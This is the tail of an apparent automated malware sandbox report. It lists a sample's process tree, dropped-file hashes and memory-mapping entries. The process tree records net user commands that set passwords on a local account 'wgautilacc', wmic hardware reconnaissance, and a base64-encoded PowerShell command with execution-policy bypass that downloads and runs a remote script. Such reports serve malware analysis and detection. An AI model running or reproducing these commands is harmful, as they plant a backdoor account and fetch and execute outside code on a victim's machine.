C:\Windows\system32\net.exenet.exe user wgautilacc kYvjN9122⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc kYvjN9123⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1MD5
4d0cb7fa714bb6b8b113319c5f37734d
SHA178fb1052d8fa35592e0f6103378658478c8d1385
SHA256469199f341db97de914a24f626d2f1ea8fe116bd6302bb10e53a027e759e7845
SHA512b2e7d6f724990ea57448429f159c713b2885354c709e206a97126b470e9705143e2695a3bd73ee3f55a160f2807f4ac215dca9df0da209bf88503069d52cd76c
-
C:\Users\Admin\AppData\Local\Temp\RES4339.tmpMD5
50b20b99b5a4a7aadfd05349dab0f94f
SHA1b97b15b279f63766b9158caaca1a66e476793c2b
SHA25640344e2f1ed1104917e5e9d96b33e33e6cd67245a399ff43dc5947ccd38f65c4
SHA512de6fb7ba2c8b40f20217c6889ce9785491ae0b2506967c653bf8898e9bc3d272e8a0d399d330e13ba65a939a13b4b0edd15e9e98e4566b297e19a76da0883d84
-
C:\Users\Admin\AppData\Local\Temp\ZyKUG6PQzM.exeMD5
c2ac724339045f253306ae9ab38cbf4f
SHA1c6abd5edb40444ce3fbc8564051545161cd85495
SHA256d626090ca79fc0a3494f3f89148180beb850299ce7cae9f115753d5c04afbc6a
SHA512b7f0e175f0112a95536a50790c73796dda160cdeb58f6d09481e3515232a774c1da2a2eaed47e9dfe0287213e794e26553358c1c45c1a8177f50c3269f2fde58
-
C:\Users\Admin\AppData\Local\Temp\ZyKUG6PQzM.exeMD5
c2ac724339045f253306ae9ab38cbf4f
SHA1c6abd5edb40444ce3fbc8564051545161cd85495
SHA256d626090ca79fc0a3494f3f89148180beb850299ce7cae9f115753d5c04afbc6a
SHA512b7f0e175f0112a95536a50790c73796dda160cdeb58f6d09481e3515232a774c1da2a2eaed47e9dfe0287213e794e26553358c1c45c1a8177f50c3269f2fde58
-
C:\Users\Admin\AppData\Local\Temp\nj0rhsok\nj0rhsok.dllMD5
df58066035d24e61dbb826ddb3470a96
SHA13ab15ccac9182d9ed8c0b305203d6502ca8993b5
SHA256180ac07089abb4e253efe49e437667b58b5e2ca8af41c6b3ae1751f97aa0de53
SHA51210f6a13ea1109f4e41fe58597f2c8fcd547ce03878d3a3297a9a04ad6d03144e2c5893e4f774303ae5f95fa196bb20cd1cad9ff0df99c7471924b4dd8a4ee736
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
065cc96fec70546c9f195f703e4d657b
SHA19da24636d8fd3de61f46ff7282640d3fa27d6b45
SHA256cc7097fa515dfc07033464b5e71ba0172f440bd4043ec1c7c48c6ce4f18e3bc3
SHA512a2fefe055067d832736c109d1ea50921bfc9275bb6fe11e57f4245cac52e1758b9b2d7fe893ece0fe5101b3cb5a1229011b8e517fe31de5202c4a7f0fa39aec0
-
\??\c:\Users\Admin\AppData\Local\Temp\nj0rhsok\CSC4A9A379BCE29450F98C1A91E8A88D1F.TMPMD5
62374593a8c844fe79522ea67f88c21e
SHA13cc6b749a918c0f3f22f0d97940b75e9f3ef73b0
SHA2566471176eb4782137b2d2b397c19db2888a7d1dfd65e2976388c3739b88c9aebf
SHA51236f9db7a333765b648f43f037ed9d064ce00ec04a464831ef105c870196645b32bccd113644eb2b91f2302955ec511c39b3e87ebd7d920b9f51db69d4f3b7fa6
-
\??\c:\Users\Admin\AppData\Local\Temp\nj0rhsok\nj0rhsok.0.csMD5
df390bc8a088b51d27253fed32186361
SHA169e6a59300fc04ef5ab53cbe061b8b2aefe375a4
SHA2564388b3b4aaccededcd9a2d864ba85967c08a4586dee2745e5539e12cb4de5c5f
SHA5124d0d050afd8809b9090e0ac8ab4f00ad4237723bfa8adb2f605fbbdd6be532bd941bccf79b7fbc0d226bc7890c2011dd18b0263af5b81911e1c8def2d9f235c8
-
\??\c:\Users\Admin\AppData\Local\Temp\nj0rhsok\nj0rhsok.cmdlineMD5
e9e262d6d0b29d1dd029f21bc91c2b81
SHA1ba9ceab757c045cf6243fdbbc8fa922028b1ab45
SHA256005397270f3027adb53af04a607fe653e97f930138b1cc3b6fc306be64b5921b
SHA512c1cfb82ec8b5e404db14d51a2c690b4eddb859e949add6edec5fe77c1ac056a721de6b750cbe40447231b0cb68ad2c7303dd27cce313b28d59cb1240162730c8
-
\Users\Admin\AppData\LocalLow\sqlite3.dllMD5
f964811b68f9f1487c2b41e1aef576ce
SHA1b423959793f14b1416bc3b7051bed58a1034025f
SHA25683bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
\Windows\Branding\mediasrv.pngMD5
ee8186ae8d2615ee4a859007556227ec
SHA10125a0caaf2ff3da1266f1893cf051ddca6460fa
SHA25696de9d90945d198cd5aed4a446e464ba13e2e4e92d3649a396825864a0fcd17f
SHA5122eebacfc81b1c974583c41f44b7726e8280098d1f371db7d7038d24bdf3724093f1fe1c0c7eff5e8d9053cd98add7882734ea0746c8b20621e67e1b06442d612
-
\Windows\Branding\mediasvc.pngMD5
7a8bf878d6438e28822cb499cb7da107
SHA136cbc7c1b2da094b773614d251704e4c2bb0e88e
SHA2569aae34a03f16047b5e795b0dcd9b717f87c54355a9928889f629f3bb06bd7e63
SHA5126c19a44f8c4251cd14c35862108a4fed4875386a5eec9763ce78679beedc0bd157560eb5a3b11209a5b4336b923133a6bf9f8f657f116744077967d6af6654ee
-
memory/184-239-0x0000000000000000-mapping.dmp
-
memory/912-245-0x0000000000000000-mapping.dmp
-
memory/1084-234-0x0000000000000000-mapping.dmp
-
memory/1328-229-0x0000000000000000-mapping.dmp
-
memory/1428-243-0x0000000000000000-mapping.dmp
-
memory/1512-227-0x0000000000000000-mapping.dmp
-
memory/1564-223-0x0000000000000000-mapping.dmp
-
memory/1596-149-0x0000000000000000-mapping.dmp
-
memory/1632-222-0x0000000000000000-mapping.dmp
-
memory/1644-233-0x0000000000000000-mapping.dmp
-
memory/1656-244-0x0000000000000000-mapping.dmp
-
memory/2128-124-0x00000214FF960000-0x00000214FF962000-memory.dmpFilesize
8KB
-
memory/2128-127-0x00000214FF966000-0x00000214FF967000-memory.dmpFilesize
4KB
-
memory/2128-126-0x00000214FF965000-0x00000214FF966000-memory.dmpFilesize
4KB
-
memory/2128-125-0x00000214FF963000-0x00000214FF965000-memory.dmpFilesize
8KB
-
memory/2128-122-0x0000021499400000-0x0000021499821000-memory.dmpFilesize
4.1MB
-
memory/2128-117-0x0000000000000000-mapping.dmp
-
memory/2168-128-0x0000000000000000-mapping.dmp
-
memory/2168-160-0x0000027FAF1C0000-0x0000027FAF1C1000-memory.dmpFilesize
4KB
-
memory/2168-133-0x0000027F96350000-0x0000027F96351000-memory.dmpFilesize
4KB
-
memory/2168-136-0x0000027FAEA00000-0x0000027FAEA01000-memory.dmpFilesize
4KB
-
memory/2168-143-0x0000027FAE7F0000-0x0000027FAE7F2000-memory.dmpFilesize
8KB
-
memory/2168-161-0x0000027FAF550000-0x0000027FAF551000-memory.dmpFilesize
4KB
-
memory/2168-144-0x0000027FAE7F3000-0x0000027FAE7F5000-memory.dmpFilesize
8KB
-
memory/2168-216-0x0000027FAE7F8000-0x0000027FAE7F9000-memory.dmpFilesize
4KB
-
memory/2168-145-0x0000027FAE7F6000-0x0000027FAE7F8000-memory.dmpFilesize
8KB
-
memory/2168-153-0x0000027F963A0000-0x0000027F963A1000-memory.dmpFilesize
4KB
-
memory/2188-241-0x0000000000000000-mapping.dmp
-
memory/2388-225-0x0000000000000000-mapping.dmp
-
memory/2416-206-0x000001789B0D8000-0x000001789B0DA000-memory.dmpFilesize
8KB
-
memory/2416-205-0x000001789B0D6000-0x000001789B0D8000-memory.dmpFilesize
8KB
-
memory/2416-177-0x000001789B0D0000-0x000001789B0D2000-memory.dmpFilesize
8KB
-
memory/2416-178-0x000001789B0D3000-0x000001789B0D5000-memory.dmpFilesize
8KB
-
memory/2416-168-0x0000000000000000-mapping.dmp
-
memory/2932-217-0x0000000000000000-mapping.dmp
-
memory/2984-209-0x00000215370C0000-0x00000215370C2000-memory.dmpFilesize
8KB
-
memory/2984-211-0x00000215370C6000-0x00000215370C8000-memory.dmpFilesize
8KB
-
memory/2984-210-0x00000215370C3000-0x00000215370C5000-memory.dmpFilesize
8KB
-
memory/2984-208-0x0000000000000000-mapping.dmp
-
memory/3340-146-0x0000000000000000-mapping.dmp
-
memory/3344-236-0x0000000000000000-mapping.dmp
-
memory/3408-121-0x0000000000000000-mapping.dmp
-
memory/3640-232-0x0000000000000000-mapping.dmp
-
memory/3652-246-0x0000000000000000-mapping.dmp
-
memory/3652-218-0x0000000000000000-mapping.dmp
-
memory/3744-120-0x0000000000000000-mapping.dmp
-
memory/3864-235-0x0000000000000000-mapping.dmp
-
memory/3868-219-0x0000000000000000-mapping.dmp
-
memory/3872-249-0x000001BCEF833000-0x000001BCEF835000-memory.dmpFilesize
8KB
-
memory/3872-251-0x000001BCEF838000-0x000001BCEF839000-memory.dmpFilesize
4KB
-
memory/3872-247-0x0000000000000000-mapping.dmp
-
memory/3872-242-0x0000000000000000-mapping.dmp
-
memory/3872-221-0x0000000000000000-mapping.dmp
-
memory/3872-250-0x000001BCEF836000-0x000001BCEF838000-memory.dmpFilesize
8KB
-
memory/3872-248-0x000001BCEF830000-0x000001BCEF832000-memory.dmpFilesize
8KB
-
memory/3904-220-0x0000000000000000-mapping.dmp
-
memory/3936-213-0x00000272FBB90000-0x00000272FBB92000-memory.dmpFilesize
8KB
-
memory/3936-212-0x0000000000000000-mapping.dmp
-
memory/3936-228-0x0000000000000000-mapping.dmp
-
memory/3936-215-0x00000272FBB96000-0x00000272FBB98000-memory.dmpFilesize
8KB
-
memory/3936-214-0x00000272FBB93000-0x00000272FBB95000-memory.dmpFilesize
8KB
-
memory/3960-240-0x0000000000000000-mapping.dmp
-
memory/3960-237-0x0000000000000000-mapping.dmp
-
memory/3960-224-0x0000000000000000-mapping.dmp
-
memory/4012-226-0x0000000000000000-mapping.dmp
-
memory/4048-115-0x0000000000400000-0x0000000000496000-memory.dmpFilesize
600KB
-
memory/4048-114-0x0000000002110000-0x00000000021A1000-memory.dmpFilesize
580KB
-
memory/4076-238-0x0000000000000000-mapping.dmp
-
memory/4236-252-0x0000000000000000-mapping.dmp
-
memory/4256-253-0x0000000000000000-mapping.dmp
-
memory/4312-254-0x0000000000000000-mapping.dmp
-
memory/4328-255-0x0000000000000000-mapping.dmp